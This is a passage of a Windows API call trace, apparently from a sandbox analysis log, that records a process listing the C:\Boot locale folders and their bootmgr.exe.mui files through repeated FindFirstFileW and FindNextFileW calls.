ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.354] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.354] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.354] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.356] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.356] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.356] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.356] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.356] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.356] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.357] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.357] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.357] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.357] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.357] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.358] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.358] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.358] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.358] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.359] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.359] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.359] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.359] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.359] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.359] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.359] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.359] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.359] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.359] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.360] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.360] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.360] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.360] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.360] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.360] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.360] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.360] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.360] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.361] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.361] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.361] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.361] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.361] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.361] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.361] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.361] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.362] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.362] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.362] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.362] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.362] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, 